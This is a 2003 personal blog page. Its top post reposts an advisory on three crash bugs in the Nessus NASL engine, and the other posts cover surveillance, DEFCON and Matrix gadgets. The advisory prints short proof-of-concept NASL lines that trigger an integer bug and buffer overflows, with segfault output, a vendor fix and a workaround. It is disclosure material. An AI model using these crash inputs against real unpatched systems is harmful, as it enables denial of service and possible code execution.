Heads Up, Nessus Expoits.
There exists some vulnerabilities in NASL scripting engine.
To exploit these flaws, an attacker would need to have a valid Nessus
account as well as the ability to upload arbitrary Nessus plugins in the
Nessus server (this option is disabled by default) or he/she would need to
trick a user somehow into running a specially crafted nasl script.

Not that these issues can NOT be exploited by a tested host to crash
nessusd remotely.

* ISSUE 1 - Integer handling vulnerability in insstr() function

Vulnerability is triggered by a negative fourth argument:

$ cat t1.nasl
insstr("aaaaaaaaaaa", "bb", 3, 0xfffffffd);

$ nasl t1.nasl
** WARNING : packet forgery will not work
** as NASL is not running as root
[1384](t1.nasl) insstr: warning! 1st index 3 greater than 2nd index -3
Segmentation fault (core dumped)

* ISSUE 2 - Buffer overflow in scanner_add_port() function

Overflow is triggered by very long 'proto' argument:

$ cat t2.nasl
scanner_add_port(port : 80, proto : crap(data:'A', length:300));

$ nasl t2.nasl
** WARNING : packet forgery will not work
** as NASL is not running as root
Segmentation fault (core dumped)

* ISSUE 3 - Buffer overflow in ftp_log_in() function

Overflow is triggered by very long 'user'/'pass' arguments:

$ cat t3.nasl
ftp_log_in(socket : open_sock_tcp(21), pass : "11", user:
crap(data:'A',length:8192));

$ nasl t3.nasl
** WARNING : packet forgery will not work
** as NASL is not running as root
Segmentation fault (core dumped)

III. VERSIONS TESTED

Linux RedHat 7.2

$ nasl -v | grep nasl
nasl 2.0.5

IV. VENDOR STATUS

New nessus 2.0.6 packages fixes these issues.

V. WORKAROUND

Make sure the option 'plugins_upload' is set to 'no' in nessusd.conf and
don't run unstrusted nasl scripts.

VI. CREDITS

Hank Leininger requested the source code audit
for some opensource projects and for nessus in particular.

Sir Mordred discovered the issues.

Renaud Deraison fixed them in an hour after being
notified.

posted by tommEE  # 5/23/2003 01:35:00 PM 0 comments

 

Is the government going to far?
I was reading on The Register, an article from Kevin Poulsen regarding the newest search and surveillance issues. It is really frightening that more people in the IS are not fightened about this. Seeing that they call computer hackers, terrorists, alarms me. I don't think my skill for stealing straming media or hacking a TiVo somehow ties me into the same groups as a rack thrower who likes to crash planes. It is embarrassing. Read the article here and get the word out.

posted by tommEE  # 5/22/2003 02:07:00 PM 0 comments

 

So it's only 71 days till DEFCON.
The DEFCON Cannonball Run is ready to go. Moloch will have a new T-shirt along with other T-shirts available. We should also have buttons and other merchandise. I am going to be looking at lights and equipment for another DEFCON Moloch Party, more moloch party pics here, sorry again for skipping last year. If I speak I will have some stuff to throw out to the audience this year too. If you can't make it to DEFCON, start looking at TOORCON, a great convention in San Diego, CA. I am sure I will prepare something for that.

posted by tommEE  # 5/21/2003 06:06:00 PM 0 comments

 

Ok, I am still a little stuck on Matrix stories but heres the new phone.
The phone is made by Samsung and is the same one that they say is used it the movie. You can check out the story on CNET or you can be lazy like me and just watch the video. The phone makes sounds and plays short animated scenes but not much more thatn that. The phones have a serial number because they are collectable but so does everything else in the world. Everything has a serial. Maybe my blender is a collectors item too. The tommEE pickles Blender on sale soon. Check out the video clip here.

posted by tommEE  # 5/20/2003 08:02:00 PM 0 comments

 

I guess this is for the kazaa handicapped.
After the fall of movies.com and intertainment.com, only two servers are left standing in the downloadable-movie business:movielink.com and cinemanow.com. (A third, starzondemand.com, is in the works.) Each charges about $4 or $5 to watch a recent movie, roughly the same amount the video store does.If you don't leech, I guess this is you penalty but DVD's are like $20 and less. It is legal to trade also.

posted by tommEE  # 5/19/2003 07:38:00 PM 0 comments

 

Latest Matrix Screensaver but it's only for OSX
I am so sick of seeing the damn' matrix screensavers but this screensaver does reproduce the Matrix screen effect well. Unfortunately it is OSX-only. Go get it here and if you find one for X86 that is better, email me.

posted by tommEE  # 5/19/2003 07:37:00 PM 0 comments

archives


This page is powered by Blogger. Isn't yours?